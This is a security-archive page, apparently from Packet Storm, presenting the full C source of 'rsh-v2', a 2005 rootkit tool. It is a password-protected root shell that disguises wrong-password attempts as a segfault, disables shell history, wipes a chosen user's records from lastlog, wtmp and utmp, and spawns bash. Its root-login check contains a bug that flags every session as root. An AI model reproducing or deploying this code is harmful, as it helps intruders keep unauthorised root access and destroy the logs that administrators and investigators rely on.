what you don't know can hurt you

rsh-v2.c

rsh-v2.c
Posted Oct 31, 2005
Authored by rotor | Site c1zc0.com

Unix log cleaner that also checks to see if root is logged in.

tags | tool, root, rootkit
systems | unix
MD5 | e2e7e8f9bb27e7b5dd66041ebd4d3766

rsh-v2.c

Change Mirror Download
/*
rsh-v2 rootshell by rotor http://www.c1zc0.com
irc.efnet.org #c1zc0
usage: ./rshv2 <pass> <user>
*/

#include <stdio.h>
#include <string.h>
#include <utmp.h>
#include <unistd.h>
#include <fcntl.h>
#include <lastlog.h>
#include <pwd.h>
#include <sys/utsname.h>

#define PASS "c1zk0"

#define _PATH_LASTLOG "/var/log/lastlog"
#define _WTMP_PATH "/var/log/wtmp"
#define _UTMP_PATH "/var/run/utmp"

int clean_last(char *path, char *user);
int wtmp_clean(char *path, char *user);
void chkr();

int main(int argc, char **argv[])
{
char *pass = argv[1];
char *pazz = PASS;
struct utsname u;
uname(&u);

if(argc < 1){
printf("Segmentation fault (core dumped)\n");
exit(0);
}
if(strcmp(pass, pazz)) {
printf("Segmentation fault (core dumped)\n");
exit(0);
} else {
setuid(0);
setuid(0);
unsetenv("PS1");
unsetenv("HISTFILE");
printf("Cleaning lastlog!\n");
clean_last(_PATH_LASTLOG, argv[2]);
printf("Cleaning WTMP\n");
wtmp_clean(_WTMP_PATH, argv[2]);
printf("Cleaning UTMP\n");
wtmp_clean(_UTMP_PATH, argv[2]);
printf("Checking for root logged in\n");
chkr();
printf("System name: %s, Node Name: %s\n", u.sysname, u.nodename);
printf("Release: %s, Version: %s\n", u.release, u.version);
execl("/bin/bash", "sh", NULL);
}
return 0;
}

int clean_last(char *path, char *user) {
FILE *lastlog_file;
struct passwd *pwd;
struct lastlog lastlog_tmp;
int count=0;

if((lastlog_file = fopen(path, "r+")) == NULL) {
printf("failed to open file %s\n", path);
return 0;
}

if ((pwd = getpwnam(user)) == NULL) {
printf("user %s not found\n", user);
return 0;
}

fseek(lastlog_file, (long)(pwd->pw_uid*sizeof(lastlog_tmp)), SEEK_SET);
bzero((char *)&lastlog_tmp, sizeof(lastlog_tmp));
fwrite((char *)&lastlog_tmp, sizeof(lastlog_tmp), 1, lastlog_file);

fclose(lastlog_file);

printf("%s cleaned!\n", path);

}

int wtmp_clean(char *path, char *user)
{
FILE *uwtmp_file;
struct utmp uwtmp_tmp;
int count=0;

if((uwtmp_file = fopen(path, "r+")) == NULL) {
printf("failed to open file %s\n", path);
return 0;
}

while(fread((char *)&uwtmp_tmp, sizeof(uwtmp_tmp), 1, uwtmp_file) > 0) {
if(strcmp(uwtmp_tmp.ut_name, user) ==0) {
fseek(uwtmp_file, -sizeof(uwtmp_tmp), SEEK_CUR);
bzero(&uwtmp_tmp, sizeof(uwtmp_tmp));
fwrite((char *)&uwtmp_tmp, sizeof(uwtmp_tmp), 1, uwtmp_file);
count++;
}
}

fclose(uwtmp_file);

if(count == 0) {
printf("user %s not found\n", user, path);
}

else printf("%s cleaned!\n", path);

}

void chkr()
{
struct utmp *entry;

int logincount=0, rootcount=0;
setutent();
while ((entry = getutent())!=NULL)
{
if(entry->ut_type != USER_PROCESS)
continue;
logincount++;

if(!strcmp(entry->ut_user, "root"));
{
printf("Caution> root is logged in on %s!\n", entry->ut_line);
rootcount++;
}
}
printf("-> %d user(s) logged in, %d root login(s)\n", logincount, rootcount);
endutent();


}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    1 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    12 Files
  • 13
    Feb 13th
    18 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    15 Files
  • 19
    Feb 19th
    19 Files
  • 20
    Feb 20th
    20 Files
  • 21
    Feb 21st
    15 Files
  • 22
    Feb 22nd
    2 Files
  • 23
    Feb 23rd
    2 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    37 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close